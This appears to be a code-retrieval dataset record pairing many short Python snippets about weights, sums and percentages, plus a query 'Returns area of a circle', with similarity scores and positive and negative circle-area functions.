[ "def test_weight_is_positive(self):\n nt.assert_greater(self.herb.weight, 0)", "def test_weighted_total(self):\r\n self.weighted_setup()\r\n self.submit_question_answer('H1P1', {'2_1': 'Correct', '2_2': 'Correct'})\r\n self.submit_question_answer('FinalQuestion', {'2_1': 'Correct', '2_2': 'Correct'})\r\n self.check_grade_percent(1.0)", "def test_weight_is_positive_carn(self):\n nt.assert_greater(self.carn.weight, 0)", "def test_basic(self):\n result = NonLinearWeights(0.85)\n self.assertAlmostEqual(result.cval, 0.85)", "def pct_bust(data):\n return round((data[\"new_total\"] > 21).sum() / len(data), 3)", "def test_weighted_accuracy(self):\n total_accuracy, weights = losses.weighted_accuracy(\n logits=self.logits, targets=self.targets, weights=self.targets >= 0)\n\n expected_accuracy = 2 / 3\n\n self.assertEqual(weights, 3)\n self.assertAlmostEqual(total_accuracy / weights, expected_accuracy)", "def check_sum(cls, values):\n _v = [0 if v is None else v for v in values.values()]\n if abs(sum(_v) - 1) > 0.01:\n raise ValueError(\n f\"All values must approximately sum to 1. Sum to {sum(_v)}\"\n )\n return values", "def check(self):\r\n self.check_probabilities()\r\n self.check_sum()", "def test_total_weight(self):\n varieties = [Coconut(variety) for variety in ['middle eastern',\n 'south asian',\n 'south asian',\n 'american',\n 'american',\n 'american']]\n self.inventory = Inventory()\n for variety in varieties:\n self.inventory.add_coconut(variety)\n self.assertEqual(self.inventory.total_weight(),\n 19.00,\n \"Your total weight is wrong\")", "def has_valid_sum(self):\n return 1 - MassFunction.precision <= self._sum() <= 1 + MassFunction.precision", "def set_weight_percent(self, void_percent=1.0):\n weight_total = 0.0\n for zaidNum, zaid in enumerate(self.zaids):\n for isotope, isotopeFraction in self.elementDict[zaid].weightPercentDict.items():\n if isotopeFraction != 0.0:\n self.weightPercent[isotope] = isotopeFraction * self.weightFraction[zaidNum] * void_percent\n weight_total += self.weightPercent[isotope]\n try:\n assert np.allclose(weight_total, 1.0 * void_percent)\n except AssertionError:\n print(\"Weight percent does not sum to 1.0 for {}. Check the material file.\".format(self.name))", "def total_weight (self, checkfn=None):\n weight = 0\n for item in self:\n if checkfn is not None and not checkfn(item):\n continue\n assert hasattr(item, \"weight\")\n weight += item.weight\n return weight", "def assert_valid_weights(self, w):\n\n if len(w) != self.n:\n raise AssertionError(\n \"Expected vector of {0} weights, received \"\n \"{1} weights instead: {2}.\".format(\n self.n,\n len(w),\n w\n ))\n\n if abs(np.sum(w) - 1.0) > 1E-6:\n raise AssertionError(\n \"Expected weights to sum to one. Instead got {0}.\".format(\n np.sum(w)\n ))", "def calculScore(self):\n for cell in self.notComputeRouter:\n if(cell.isCovered==True):\n self.score += 1000\n self.score += self.budget", "def _negative_weights_limit_sum(self, value):\n weights = self # simpler to change to data attribute and nicer to read\n value = abs(value) # simplify code, prevent erroneous assertion error\n if sum(weights[self.mu:]) >= -value: # nothing to limit\n return # needed when sum is zero\n assert weights[-1] < 0 and weights[self.mu] <= 0\n factor = abs(value / sum(weights[self.mu:]))\n if factor < 1:\n for i in range(self.mu, self.lambda_):\n weights[i] *= factor\n if self.debug:\n print(\"sum w = %.2f (with correction %.2f)\" %\n (sum(weights), value))\n assert sum(weights) + 1e-5 >= 1 - value", "def binary_weight_neg(self) -> float:\n articles_of_not_theme_count = self.total_article_count - self.article_of_theme_count\n return (1 / articles_of_not_theme_count)*(self.total_article_count)/2.0", "def test_negative_weights(self):\n values = np.array([0, 1, 2, 2, 3])\n weights = np.array([1, -1, 3, -2, 1])\n\n hist_exp = np.array([1, -1, 2])\n # uncertainties are the sqrt(sum of squared weights)\n unc_exp = np.sqrt(np.array([1, (-1) ** 2, 3**2 + (-2) ** 2 + 1]))\n\n _, hist, unc, _ = hist_w_unc(values, weights=weights, bins=3, normed=False)\n np.testing.assert_array_almost_equal(hist_exp, hist)\n np.testing.assert_array_almost_equal(unc_exp, unc)", "def test_percentage_is_100(self):\n metric = self.metric(direction=\">\")\n sources = [self.source(metric, value=\"0\", total=\"0\")]\n measurement = self.measurement(metric, sources=sources)\n self.assertEqual(\"100\", measurement[\"percentage\"][\"value\"])", "def test_accuracy(self):\n total_accuracy, weights = losses.weighted_accuracy(\n logits=self.logits, targets=self.targets)\n\n expected_accuracy = 2 / 3\n\n self.assertEqual(weights, 3)\n self.assertAlmostEqual(total_accuracy / weights, expected_accuracy)", "def _check_amount_with_priority(self):\n\t\tfor slc in self:\n\t\t\tif slc.max_amount and self.search([('priority', '<', slc.priority), ('max_amount', '>=', slc.max_amount)]):\n\t\t\t\traise Warning(_(\"There are below slides [Priority less than %s] with bigger amount from [%s]\"\n\t\t\t\t \" which against the logic!!!\\n You can increase amount or handel priority\")\n\t\t\t\t % (slc.priority, slc.max_amount))", "def check_overall_energy(self):\n energy = 0\n for student in self.students:\n energy += int(student.energy_level)\n for mentor in self.mentors:\n energy += int(mentor.energy_level)\n print(\"Overall energy equals \", energy)", "def loss_check(self):\n if sum(x >= y for x, y in zip(self.elbos[-100:], self.elbos[-99:])) > 50 and\\\n self.elbos[-1] - self.elbos[-100] < 1e-3*abs(self.elbos[-100]):\n return True", "def test_return_goal_weight_actual_weight_is_too_low(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"45\",\n \"cruising_weight\": \"45\", \"weight_goal\": \"40\"}\n goal_weight = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[2]\n\n self.assertFalse(goal_weight)", "def test_values(self):\n result = NonLinearWeights(0.6).nonlinear_weights(6)\n expected_result = np.array(\n [0.41957573, 0.25174544, 0.15104726, 0.09062836, 0.05437701, 0.03262621]\n )\n self.assertArrayAlmostEqual(result.data, expected_result)", "def test_node_weight_range_min(self):\n n = Node(inputs=6)\n for i in n.weights:\n self.assertGreaterEqual(i, -0.1)", "def weighted_estimation(self) -> bool:\n pass", "def test_random_100_balance_remains_between_1_and_negative_1(bst_100_rand):\n assert bst_100_rand.balance() in range(-1, 2)", "def test_return_goal_goal_weight_is_too_low(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"60\",\n \"cruising_weight\": \"45\", \"weight_goal\": \"40\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[0]\n\n self.assertEqual(return_goal, 12.6)", "def test_node_weight_range_max(self):\n n = Node(inputs=3)\n for i in n.weights:\n self.assertLess(i, 0.1)", "def test_percentage_lost_weight(self):\n user_created = self.create_user()\n percentage_return = self.new_calculation.percentage_lost_weight(user_created)\n\n self.assertEqual(percentage_return, 10)\n self.assertEqual(type(percentage_return), int)", "def test_bayes_updates_good_data(self):\r\n # result for first -> fourth calculated by hand\r\n for obs, exp in zip(bayes_updates(self.test), self.result):\r\n self.assertFloatEqualAbs(obs, exp, 1e-11)", "def validate(self):\n if self.isEmpty(): return False\n\n sum = 0\n for item in self.mask:\n sum += item.prob\n return sum == 1", "def test_probabilities_are_ok(self, seed):\n bins = defaultdict(int)\n probs = (0.1, 0.2, 0.3, 0.4)\n categories = (\"asdfa\", \"2\", \"3\", \"4\")\n categories = OrderedDict(zip(categories, probs))\n dim = Categorical(\"yolo\", categories)\n for _ in range(500):\n sample = dim.sample(seed=seed)[0]\n bins[sample] += 1\n for keys in bins.keys():\n bins[keys] /= float(500)\n for key, value in categories.items():\n assert abs(bins[key] - value) < 0.01", "def test_return_goal_weight_goal_weight_is_too_low(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"60\",\n \"cruising_weight\": \"45\", \"weight_goal\": \"40\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[2]\n\n self.assertEqual(return_goal, 47.4)", "def grade(self) -> float:\n assert self._results, \"Tests have not been run\"\n return sum(\n weight\n for test, weight in self.test_weights.items()\n if self._results[test].wasSuccessful()\n )", "def check_accuracy (data, labels, weights):\n\tcount = 0\n\tgs = []\n\trs = []\n\tfor x in range(0,len(data)):\n\t\tresults = dot(data[x], weights)\n\t\tguess = unit_step(results)\n\t\tgs.append(guess) # append prediction\n\t\trs.append(labels[x]) # append result\n\t\tif guess - labels[x] == 0:\n\t\t\tcount += 1\n\n\tpercentage = ((float(count) / len(data)) * 100)\n\n\treturn percentage", "def test_array_sum_equals_one(self):\n plugin = NonLinearWeights(0.85)\n result = plugin.process(self.cube, self.coord_name)\n self.assertAlmostEqual(result.data.sum(), 1.0)", "def calculate_weighted_results():\n pass", "def test_weight_decrease(self):\n new_weight = (1 - 0.05) * self.herb.weight\n self.herb.weightloss()\n nt.assert_equal(round(self.herb.weight, 7), round(new_weight, 7))", "def test_perc(perc):\n num_wet = perc.num_wet()\n\n while True:\n perc.step()\n\n if perc.bottom_row_wet():\n return True\n\n new_num_wet = perc.num_wet()\n if new_num_wet == num_wet:\n return False\n\n num_wet = new_num_wet", "def test_straight_100_balance_remains_between_1and_negative_1():\n from bbst import Bst\n tree = Bst(x for x in range(100))\n assert tree.balance() in range(-1, 2)", "def test_return_goal_actual_weight_is_too_low(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"45\",\n \"cruising_weight\": \"45\", \"weight_goal\": \"40\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[0]\n\n user_goal = \"impossible\"\n self.assertEqual(return_goal, user_goal)", "def check_sum(self) -> str:\n pass", "def _check_cost(self, cr, uid, ids, context=None):\n for enrich in self.browse(cr, uid, ids, context=context):\n if enrich.amount <= 0:\n raise osv.except_osv(_('ValidateError'), _('The Cost Must Be Greater Than Zero!'))\n return True", "def test_uncertainties(self):\n new_wave = np.linspace(0.9, 2.1, 200)\n\n # Without uncertainties\n binned = u.spectres(new_wave, self.wave, self.flux)\n self.assertEqual(len(binned), 2)\n\n # With uncertainties\n binned = u.spectres(new_wave, self.wave, self.flux, self.flux/100.)\n self.assertEqual(len(binned), 3)", "def test_total_integers(self):\n int_list = [5, 10, 50, 35]\n assert cr.total(int_list) == 100", "def administer(self):\n\n score = 0.0\n for question in self.questions:\n if question.ask_and_evaluate() is True:\n score += 1\n return (score / len(self.questions)) * 100", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def test_UpdateHealthLessThan0 (self) :\n\t\t\n\t\tself.person3.updateHealth ()\n\t\tself.assertEqual(self.person3.getHealth(), \\\n\t\t100 + self.healthEffect2)\n\t\tself.person3.updateHealth ()\n\t\tself.assertEqual(self.person3.getHealth(), 0)", "def __neff(self):\n return 1. / np.sum(np.square(self.weights))", "def bet_check(m):\n try:\n value = float(m.content)\n if 0 <= value <= player.coins:\n return True\n else:\n return False\n except:\n return False", "def test_non_zero_sum_profile_welfare():\n game = matgame.matgame([[[3.5, 2.5]]])\n assert np.isclose(\n regret.pure_social_welfare(game, [1, 1]), 6\n ), \"didn't properly sum welfare\"", "def test_is_ramped_using_int(self):\n self.feature_test.set_percentage(100)\n self.assertTrue(self.feature_test._is_ramped(5))", "def evaluate_binary_consistency(self):\n\n change_rw = 0\n change_sm = 0\n th = [0.005]\n for threshold in th:\n raw_th = [self.rw_data[t] > threshold for t in range(0, self.T)]\n smooth_th = [self.smth_data[t] > 0 for t in range(0, self.T)]\n # print(\"Zeros rw:\", get_avg_zeros_per_row(raw_th))\n # print(\"Zeros sm:\", get_avg_zeros_per_row(self.smth_data))\n change_rw = change_rw + self.change_of_network_over_time(raw_th)\n change_sm = change_sm + self.change_of_network_over_time(smooth_th)\n\n change_rw = change_rw / len(th)\n change_sm = change_sm / len(th)\n\n return change_rw, change_sm", "def _negative_weights_set_sum(self, value):\n weights = self # simpler to change to data attribute and nicer to read\n value = abs(value) # simplify code, prevent erroneous assertion error\n assert weights[self.mu] <= 0\n if not weights[-1] < 0:\n # breaks if mu == lambda\n # we could also just return here\n # return\n istart = max((self.mu, int(self.lambda_ / 2)))\n for i in range(istart, self.lambda_):\n weights[i] = -value / (self.lambda_ - istart)\n factor = abs(value / sum(weights[self.mu:]))\n for i in range(self.mu, self.lambda_):\n weights[i] *= factor\n assert 1 - value - 1e-5 < sum(weights) < 1 - value + 1e-5\n if self.debug:\n print(\"sum w = %.2f, sum w^- = %.2f\" %\n (sum(weights), -sum(weights[self.mu:])))", "def if_any(self, other):\n return self.weighted_by_sum(other)", "def sample_contribution_(bin_weights, sample_i, sample_weight, model, specific_scores, Y):\n\n bin_weight = np.sum([w for _, w in bin_weights])\n return sample_weight / bin_weight * (\n (Y[sample_i] == model.classes_[class_index]) - specific_scores[sample_i])", "def test_false_positive_rate(self):\n # For the penalty, the default loss is hinge.\n expected_penalty_numerator = np.sum(\n np.maximum(0.0, 1.0 + self._penalty_predictions) *\n (self._penalty_labels <= 0.0) * self._penalty_weights *\n self._penalty_predicate)\n expected_penalty_denominator = np.sum(\n (self._penalty_labels <= 0.0) * self._penalty_weights *\n self._penalty_predicate)\n expected_penalty_value = (\n expected_penalty_numerator / expected_penalty_denominator)\n\n # For the constraint, the default loss is zero-one.\n expected_constraint_numerator = np.sum(\n (0.5 * (1.0 + np.sign(self._constraint_predictions))) *\n (self._constraint_labels <= 0.0) * self._constraint_weights *\n self._constraint_predicate)\n expected_constraint_denominator = np.sum(\n (self._constraint_labels <= 0.0) * self._constraint_weights *\n self._constraint_predicate)\n expected_constraint_value = (\n expected_constraint_numerator / expected_constraint_denominator)\n\n actual_expression = binary_rates.false_positive_rate(self.context)\n self.check_rates(expected_penalty_value, expected_constraint_value,\n actual_expression)", "def test_non_zero_loss(self):\n # Reset models.\n self.model.load_state_dict(self.initial_model_dict)\n self.actor_model.load_state_dict(self.initial_actor_model_dict)\n\n polybeast.learn(*self.learn_args)\n\n self.assertNotEqual(self.stats[\"total_loss\"], 0.0)\n self.assertNotEqual(self.stats[\"pg_loss\"], 0.0)\n self.assertNotEqual(self.stats[\"baseline_loss\"], 0.0)\n self.assertNotEqual(self.stats[\"entropy_loss\"], 0.0)", "def testConsistency(self):\n #self.assertAlmostEqual(self.fxlinkedcashflow.amount(),0)", "def weightedBoldness(self):\n\n\t\treturn sum([blend.varietal.boldness * blend.portion / 100.0 for blend in self.blends])", "def test_histogram_weighted_not_normalised(self):\n bin_edges, hist, unc, band = hist_w_unc(\n self.input, weights=self.weights, bins=self.n_bins, normed=False\n )\n\n np.testing.assert_array_almost_equal(self.bin_edges, bin_edges)\n np.testing.assert_array_almost_equal(self.hist_weighted, hist)\n np.testing.assert_array_almost_equal(self.unc_weighted, unc)\n np.testing.assert_array_almost_equal(self.band_weighted, band)", "def test_check_null_weight_with_nonzeros() -> None:\n sample_weight = np.ones_like(y_toy)\n sw_out, X_out, y_out = check_null_weight(sample_weight, X_toy, y_toy)\n np.testing.assert_almost_equal(sw_out, sample_weight)\n np.testing.assert_almost_equal(X_out, X_toy)\n np.testing.assert_almost_equal(y_out, y_toy)", "def test_barnes_weights():\n kappa = 1000000\n\n gamma = 0.5\n\n dist = np.array([1000, 2000, 3000, 4000])**2\n\n weights = barnes_weights(dist, kappa, gamma) * 10000000\n\n truth = [1353352.832366126918939,\n 3354.626279025118388,\n .152299797447126,\n .000000126641655]\n\n assert_array_almost_equal(truth, weights)", "def test_barnes_weights():\n kappa = 1000000\n\n gamma = 0.5\n\n dist = np.array([1000, 2000, 3000, 4000])**2\n\n weights = barnes_weights(dist, kappa, gamma) * 10000000\n\n truth = [1353352.832366126918939,\n 3354.626279025118388,\n .152299797447126,\n .000000126641655]\n\n assert_array_almost_equal(truth, weights)", "def test_return_goal_under_cruising_weight(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"60\",\n \"cruising_weight\": \"55\", \"weight_goal\": \"51\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[0]\n\n self.assertEqual(return_goal, 9)", "def test_return_goal_weight_under_cruising_weight(self):\n data_weight_user = {\"height\": \"1,60\", \"actual_weight\": \"60\",\n \"cruising_weight\": \"55\", \"weight_goal\": \"51\"}\n return_goal = self.new_weight_advice_goal.return_weight_advices_goal(data_weight_user)[2]\n\n self.assertEqual(return_goal, 51)", "def activate(self, inputs):\n\t\tstrength = np.dot(self.weights, inputs)\n\t\t# if strength <= self.threshold:\n\t\t# \tself.result = 0\n\t\t# else:\n\t\t# \tself.result = 1\n\t\t# return self.result\n\t\treturn int(strength > self.threshold)", "def test_feeding_weight_carn(self):\n original = self.carn.weight\n self.carn.fitness = 1\n herb = [Herbivore(age=90) for _ in range(50)]\n self.carn.feeding(herb)\n nt.assert_greater(self.carn.weight, original)", "def percent_raised(self):\n total_cost = self.total_cost()\n if total_cost:\n return round(self.total_raised() * 100 / total_cost, 2)\n else:\n return 0", "def calcul_max_loss(self, percent_allowable_loss):\n if self.capital * percent_allowable_loss / 100 > self.minimal_buy:\n return self.capital * percent_allowable_loss / 100\n else:\n return self.minimal_buy", "def calculate_profit(self):", "def is_dominant_weight(self): # Or is_dominant_integral_weight?\n alphacheck = self.parent().simple_coroots()\n from sage.rings.semirings.non_negative_integer_semiring import NN\n return all(self.inner_product(alphacheck[i]) in NN\n for i in self.parent().index_set())", "def is_valid(self):\n sum_prob_per_var = {}\n for rule in self.rules:\n var, prob = rule.variable, rule.probability\n if prob < 0:\n return False\n sum_prob_per_var[var] = sum_prob_per_var.get(var, 0) + prob\n return all(sum_prob == 1.0 for sum_prob in sum_prob_per_var.values())", "def assert_positive(x):\n \n assert(all(x) >= 0)", "def perform_strategy(self, counter):\r\n if counter < self.percent * len(self.envelopes): # in the first self.percent percent\r\n self.curr_max = max(self.curr_max, self.envelopes[counter].money)\r\n return\r\n return self.envelopes[counter].money > self.curr_max", "def test_feeding_weight(self):\n original = 20\n self.herb.weight = 20\n self.herb.feeding(10)\n nt.assert_greater(self.herb.weight, original)", "def test_two_player_zero_sum_pure_wellfare(strategies):\n game = gamegen.two_player_zero_sum_game(strategies)\n for prof in game.profiles():\n assert np.isclose(\n regret.pure_social_welfare(game, prof), 0\n ), \"zero sum profile wasn't zero sum\"", "def check(self):\n self.lower_bound(5e-4)\n self.upper_bound(5e2)", "def test_percentage_is_zero(self):\n metric = self.metric(direction=\"<\")\n sources = [self.source(metric, value=\"0\", total=\"0\")]\n measurement = self.measurement(metric, sources=sources)\n self.assertEqual(\"0\", measurement[\"percentage\"][\"value\"])", "def validateInputWeightCounts(cheese_weights, n):\r\n wght_count_flag = True\r\n if len(cheese_weights) < n:\r\n wght_count_flag = False\r\n print(\"Invalid Input, provided weights are lesser \"\r\n \"than the earlier input weight count\")\r\n print(\"Exiting....\")\r\n elif len(cheese_weights) < n:\r\n wght_count_flag = False\r\n print(\"Invalid Input, provided weights are more\" \r\n \"than the earlier input weight count %s\", str(n))\r\n print(\"Exiting....\")\r\n return wght_count_flag", "def bin_contribution_(bin_weights, card_dataset, sample_contributions):\n bin_weight = np.sum([w for _, w in bin_weights])\n return bin_weight / card_dataset * np.abs(np.sum(sample_contributions))", "def test_compute_unnormalized_scores(self):\n # todo: implement this test!\n pass", "def get_expected_objective(self) -> float:\n # pylint: disable=invalid-name\n obj = 0.\n for gr in self.grounded.values():\n dist = gr.get_expected_dist_to_satisfaction()\n obj += 1 - self.weight * max(0, dist) ** 2\n return obj", "def calcul_risk(self):\n if (self.take_profit - self.buy_price) >= (\n self.buy_price - self.stop_loss\n ) * self.risk:\n return True\n else:\n return False", "def test(self, tweets, without_neutral=True):\n correct = 0\n total = 0\n for tweet in tweets:\n assert tweet.polarity is not None\n if tweet.is_neutral() and without_neutral:\n continue\n\n if tweet.polarity == self.predict_sentiment_enum(tweet, without_neutral):\n correct += 1\n\n total += 1\n\n print(\"correct = \", correct, \"total = \", total)\n return correct / total", "def compare_sum(values, weights):\n return np.sum(values.numpy())", "def _no_improve(self):\n improve = [p-f for (f,p),_ in self.population]\n return np.mean(improve) < 1.0", "def scoring(self):\n return -100 if self.loss_condition() else 0", "def test_check_null_weight_with_zeros() -> None:\n sample_weight = np.ones_like(y_toy)\n sample_weight[:1] = 0.0\n sw_out, X_out, y_out = check_null_weight(sample_weight, X_toy, y_toy)\n np.testing.assert_almost_equal(sw_out, np.array([1, 1, 1, 1, 1]))\n np.testing.assert_almost_equal(X_out, np.array([[1], [2], [3], [4], [5]]))\n np.testing.assert_almost_equal(y_out, np.array([7, 9, 11, 13, 15]))", "def test_weight(self):\n # create a coconut of each type\n self.nuts = [Coconut(variety) for variety in ['middle eastern',\n 'south asian',\n 'american']]\n \n # check that weights are as expected\n self.weights = [2.5, 3.0, 3.5]\n for i in range(0,3):\n self.assertEqual(self.nuts[i]._Coconut__weight,\n self.weights[i],\n \"The weight is wrong\")", "def expose(self, w):\n # Compute the weighted sum of the firing inputs\n s = self.strength[list(w.offset)].sum()\n if self.training:\n return s >= self.H\n else:\n return s >= self.H*self.G", "def check_sum(self):\r\n self.num_agents = self.probabilities.shape[0]\r\n self.num_choices = self.probabilities.shape[-1]\r\n #print 'OLD CUM SUM'\r\n #cumsum_across_rows = self.probabilities.cumsum(-1)[:,-1]\r\n #print cumsum_across_rows\r\n #print 'NEW CUM SUM'\r\n cumsum_across_rows = self.probabilities.sum(-1)\r\n #print cumsum_across_rows\r\n diff_from_unity = abs(cumsum_across_rows - 1)\r\n #print self.probabilities\r\n #print diff_from_unity\r\n #print diff_from_unity\r\n #rowsId = diff_from_unity < 1e-6\r\n #a = array(range(self.probabilities.shape[0]))+1\r\n\r\n #print self.probabilities[~rowsId], a[~rowsId]\r\n\r\n if not ma.all(diff_from_unity < 1e-6):\r\n raise ProbabilityError, \"\"\"probability values do not add up \"\"\" \\\r\n \"\"\"to one across rows\"\"\"", "def is_number_correct(total):\n if int(total) < 0:\n return None\n return True", "def estimate_total_health(self) -> None:\n crew_health = 0\n for operator in self.__operators:\n crew_health += operator.health\n crew_health += self.__health\n self.__health = crew_health / (len(self.__operators) + 1)", "def SetPRBinConstraint(self, model ) :\n tot = np.multiply(self.wish, self.dispo)\n for val in tot :\n if not val : continue\n if self.bound>0 : model += val <= self.valBound\n elif self.bound<0 : model += val >= self.valBound", "def test_probability_of_all_successes():\n\n assert(probability_of_all_successes(1/2,1,2) == 0.25)\n assert(are_close(probability_of_all_successes(1/6,1,2), 1/36, 0.001))\n assert(are_close(probability_of_all_successes(1/2,2,2), 7/16, 0.001))", "def test_weighted_exam(self):\r\n self.weighted_setup()\r\n self.submit_question_answer('FinalQuestion', {'2_1': 'Correct', '2_2': 'Correct'})\r\n self.check_grade_percent(0.75)", "def calc_is_weight(self, nodes_value):\n beta = self.beta.step()\n nodes_value = torch.tensor(nodes_value)\n sample_probabilities = nodes_value / self.sum_tree.top_node.value\n weights = ((1 / (len(self) * sample_probabilities.to(self.device))) ** beta)\n weights /= weights.max()\n return weights", "def evaluateVoteCount(toCompare):\n\n #weight = 0\n\n if int(toCompare['vote_count']) >= 5000:\n weight = 100\n elif 3000 <= int(toCompare['vote_count']) < 5000:\n weight = 80\n elif 2000 <= int(toCompare['vote_count']) < 3000:\n weight = 60\n elif 1000 <= int(toCompare['vote_count']) < 2000:\n weight = 40\n elif 500 <= int(toCompare['vote_count']) < 1000:\n weight = 20\n else:\n weight = 0\n return weight" ]
[ "0.65198725", "0.6382042", "0.63662297", "0.6255529", "0.62205875", "0.61262256", "0.6087317", "0.598844", "0.59880143", "0.5920109", "0.5900693", "0.5828325", "0.58246195", "0.5804198", "0.57612586", "0.5741681", "0.5738628", "0.5719216", "0.56939536", "0.56896657", "0.5688386", "0.56793255", "0.5669221", "0.5629621", "0.56193066", "0.5604948", "0.56000274", "0.5596337", "0.55854905", "0.55748737", "0.5571769", "0.5552702", "0.55461335", "0.5545532", "0.55192274", "0.5511455", "0.5505226", "0.5498765", "0.54813755", "0.5461982", "0.5461316", "0.545231", "0.54430676", "0.5434512", "0.5433004", "0.54235876", "0.5412957", "0.5410792", "0.5408024", "0.5399825", "0.5399726", "0.5399404", "0.5384428", "0.5372976", "0.53677905", "0.5354475", "0.5353375", "0.53499377", "0.53485984", "0.5342023", "0.533998", "0.5323141", "0.532279", "0.5321927", "0.5321927", "0.532133", "0.5315572", "0.5314054", "0.53135055", "0.530951", "0.53060013", "0.52995366", "0.5292549", "0.5287765", "0.5282542", "0.527624", "0.5276015", "0.5273359", "0.52676785", "0.52603185", "0.52602446", "0.52592516", "0.5258331", "0.52558935", "0.5252852", "0.5251124", "0.5246202", "0.5246031", "0.5230801", "0.5227174", "0.5222754", "0.52186984", "0.5217663", "0.5206307", "0.5202208", "0.52016526", "0.5201005", "0.52001154", "0.5192943", "0.5191482" ]
0.54984707
38
Returns area of a circle
def area(self): return math.pi * self._r ** 2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def circle_area(circle):\n return pi * circle.radius * circle.radius", "def area_of_circle(radius):\n return radius", "def circle_area(radius):\n area = radius ** 2 * math.pi\n return area", "def area(self):\n\t\t#print (self.radius*self.radius*math.pi)\n\t\tcircle_area = (self.radius*self.radius*math.pi)\n\t\treturn circle_area", "def area_circle(radius):\n \n pi = 3.1459\n area = pi * radius * radius\n return area", "def circle_area(radius):\n return math.pi * radius ** 2", "def circleArea(radius):\n return math.pi * radius * radius", "def area_circle(r):\n return (r ** 2) * math.pi", "def area_of_circle(r):\n a = r**2 * math.pi\n return a", "def area_of_circle(r):\n a = r**2 * math.pi\n return a", "def circle_area(self):\n return np.pi * self.ring_radius ** 2", "def circleArea(radius):\n radius = float(radius)\n return math.pi*(radius**2)", "def circle_area(radius : number) -> number:\n area = pi*radius*radius\n #print(\"The area of circle is =\", area, \"sq.units\")\n return area", "def area(self):\n return self.radius*self.radius*math.pi", "def area(self):\n return (self.__radius ** 2 * math.pi)", "def area(self):\n return math.pi * self.radius ** 2", "def area(self):\n return math.pi * self.radius ** 2", "def area(self):\r\n return math.pi*(self.__radius**2)", "def area(self):\n return math.pi * math.pow(self.radius, 2)", "def area_of_circle(radius = radious):\n area = radius * radious * 3.142\n print(\"Calculating area...\")\n time.sleep(2)\n return area", "def area_circle(l):\n a = math.pi * ((l / 2) ** 2)\n return a", "def area(self):\n return math.pi*self._radius*self._radius", "def getArea(self):\n return math.pi * self.radius ** 2", "def area_circle(radius):\n area = PI * radius**2\n return '{:.4f}'.format(area)", "def area_circle(radius: float) -> float:\r\n if radius < 0:\r\n raise ValueError(\"area_circle() only accepts non-negative values\")\r\n return pi * radius**2", "def circle_area(r):\n if r < 0:\n raise ValueError(\"Radius cannot be negative\")\n\n return pi*(r**2)", "def getArea(self):\n return math.pi * self.__radius * self.__radius", "def calculate_area(radius):\n area = math.pi * radius ** 2\n print(\"Area of a circle with a radius of\", radius, \"is\",\n format(area, \".3f\"))", "def circle_area(pop):\n\treturn math.pi * pop / (200.0 ** 2)", "def compute_area(radius):\n radius = int(input(\"What is the radius of the circle? \\n> \"))\n \n while radius <=0:\n radius = int(input(\"Sorry, must give a number greater than 0. \\n> \"))\n \n area = (pi * pow(radius, 2))\n \n #t.circle(radius)\n \n return area", "def area(radius):\n from math import pi\n if radius<0:\n return None\n else: \n return radius**2*pi", "def calculate_area(radius: int) -> None:\n\n # process\n area = math.pi * radius ** 2\n\n # output\n print(f\"The area is {area:.2f} cm²\")", "def area(x, y):\n return x*y/2", "def cone_area(radius: number, height: number) -> number:\n return pi*radius*(radius + sqrt(radius**2 + height**2))", "def circle_surface_area(a):\n return (a*a*math.pi)", "def area(r):\n return np.pi * (r ** 2)", "def area(symbol):\n return (symbol.bounding_box.vertices[2].x - symbol.bounding_box.vertices[0].x) * (\n symbol.bounding_box.vertices[2].y - symbol.bounding_box[0].y)", "def calc_area(diameter):\n\n if diameter > 0:\n area = pi * (diameter/2) ** 2\n \n return area", "def cylinder_area(radius: number, height: number) -> number:\n area = 2*pi*radius*(radius+height)\n return area", "def area(\n self):\n pi = numpy.pi\n area0 = 4.0 * pi / 8.0\n areadiv = 4.0 ** self.depth\n area = area0 / areadiv * (180.0 / pi) ** 2\n return area", "def Intarea( xc, yc, r, x0, x1, y0, y1):\n\n#\n# Shift the objects so that the circle is at the origin.\n#\n x0 = x0 - xc\n y0 = y0 - yc\n x1 = x1 - xc\n y1 = y1 - yc\n\n return Oneside( x1, y0, y1, r ) + Oneside( y1, -x1, -x0, r ) +\\\n Oneside( -x0, -y1, -y0, r ) + Oneside( -y0, x0, x1, r )", "def area(diam):\n radius = diam / 2\n return(pi * radius * radius)", "def sphere_area(radius : number) -> number:\n area = 4*pi*radius*radius\n return area", "def circumference_area(radius):\n return float('%.3f'%(radius * math.pi))", "def area(x1, y1, x2, y2, x3, y3):\n return abs((x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2)) / 2.0)", "def area_ellipse(radius_x: float, radius_y: float) -> float:\r\n if radius_x < 0 or radius_y < 0:\r\n raise ValueError(\"area_ellipse() only accepts non-negative values\")\r\n return pi * radius_x * radius_y", "def sphereArea(radius):\n area = 4 * math.pi * radius ** 2\n return area", "def findArea(self):\n\n a, b = self.sides\n area = a * b\n print(f\"Are of rectangle is: {area}\")", "def area(self):\n area = 0\n last = self._coordinates[-1]\n for c in self._coordinates:\n area += (last[0] * c[1] - last[1] * c[0])\n last = c\n return float(\"{:.2f}\".format(abs(area) * 0.5))", "def area(self):\n area = 0.25*self._sides*self._length**2 / math.tan(math.radians(180/self._sides))\n return float('{:.2f}'.format(area))", "def area(self):\n if isinstance(self.crs, GeographicalCRS):\n major_axis = self.crs.ellipsoid.a\n minor_axis = 